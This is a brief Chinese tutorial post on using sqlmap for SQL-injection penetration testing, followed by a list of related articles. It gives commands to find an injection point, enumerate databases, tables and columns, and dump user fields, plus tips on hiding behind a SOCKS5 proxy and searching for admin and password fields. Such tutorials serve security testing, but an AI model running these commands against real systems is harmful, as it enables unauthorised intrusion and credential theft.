数据库渗透测试--sqlmap

本文涉及的产品
RDS MySQL Serverless 基础系列,0.5-2RCU 50GB
云原生数据库 PolarDB MySQL 版,Serverless 5000PCU 100GB
云数据库 Redis 版,社区版 2GB
推荐场景:
搭建游戏排行榜
简介: sqlmap常用方式

首先确定注入点:
sqlmap -u http://192.168.0.1 --data "search=df"
一般情况需要隐藏自己使用代理:参数:--proxy=socks5://127.0.0.1:1080
还可以设置浏览器的代理模式:--random-agent
指定数据库类型:-dbms mysql、oracle…..
当程序有防get注入的时候,可以使用cookie注入
-cookie level 2(只有等级2 才可以检测到cookie)
post注入:
抓包以后可以用 -p 指定注入点(这里也可以使用*标注)

确定注入点之后,查找数据库:
sqlmap -u http://192.168.0.1 --data "search=df" -dbs --proxy=socks5://127.0.0.1:1080

找到数据库之后,根据数据库查询表名:(例如数据库名为sysbase)
sqlmap -u http://192.168.0.1 --data "search=df" -D sysbase --tables

查询到表之后,看字段信息:(例如sys_user)
sqlmap -u http://192.168.0.1 --data "search=df" -D sysbase -T sys_user --columns

单线程跑的慢可以适当增加线程:--threads 5
有些也需要设置时间延迟:--time-sec 3000
有时候需要转码:--no-cast或者--hex

获取字段内容(username):
sqlmap -u http://192.168.0.1 --data "search=df" -D sysbase -T sys_use -C "username" --dump

从数据库中搜索字段
-D test -search -C admin,password 从数据库test搜索admin,password字段

目录
相关文章
|
1月前
|
NoSQL 算法 大数据
国内首个图计算标准发布,悦数图数据库通过测试
近日,经中国通信标准化协会批准,《大数据图计算平台技术要求与测试方法》标准正式发布,这是我国首个图计算平台标准,为图计算平台的发展提供了一个标准化的指导方针,对于推动我国图技术的发展具有重要意义。
|
1月前
|
JavaScript Java 测试技术
大学生体质测试|基于Springboot+vue的大学生体质测试管理系统设计与实现(源码+数据库+文档)
大学生体质测试|基于Springboot+vue的大学生体质测试管理系统设计与实现(源码+数据库+文档)
34 0
|
1月前
|
SQL 测试技术 网络安全
Python之SQLMap:自动SQL注入和渗透测试工具示例详解
Python之SQLMap:自动SQL注入和渗透测试工具示例详解
96 0
|
1月前
|
存储 大数据 测试技术
矢量数据库的性能测试与评估方法
【4月更文挑战第30天】本文探讨了矢量数据库的性能测试与评估方法,强调其在大数据和AI时代的重要性。文中介绍了负载测试、压力测试、容量测试、功能测试和稳定性测试五大评估方法,以及实施步骤,包括确定测试目标、设计用例、准备环境、执行测试和分析结果。这些方法有助于确保数据库的稳定性和高效性,推动技术发展。
|
1月前
|
NoSQL 算法 测试技术
图数据库基准测试 LDBC SNB 系列讲解:Schema 和数据生成的机制
作为大多数图数据库性能测试标配的 LDBC SNB 它是如何保障不同系统环境之间的测评比较公平且基准测试结果可重复的呢?本文从数据和 Schema 生成入手同你讲解它的原理。
70 2
图数据库基准测试 LDBC SNB 系列讲解:Schema 和数据生成的机制
|
1月前
|
SQL 关系型数据库 MySQL
stream-query多数据库进行CI测试
stream-query多数据库进行CI测试
19 0
|
1月前
|
存储 SQL 数据库
【Android 从入门到出门】第六章:使用Room数据库并测试
【Android 从入门到出门】第六章:使用Room数据库并测试
59 4
|
1月前
|
弹性计算 分布式计算 DataWorks
DataWorks报错问题之ecs自建数据库连通性测试报错如何解决
DataWorks是阿里云提供的一站式大数据开发与管理平台,支持数据集成、数据开发、数据治理等功能;在本汇总中,我们梳理了DataWorks产品在使用过程中经常遇到的问题及解答,以助用户在数据处理和分析工作中提高效率,降低难度。
|
9月前
|
监控 Oracle 关系型数据库
测试数据库性能的工具知多少
测试数据库性能的工具知多少
268 0
|
1月前
|
SQL 人工智能 NoSQL
向量数据库测试写入查看数据
向量数据库测试写入查看数据
110 0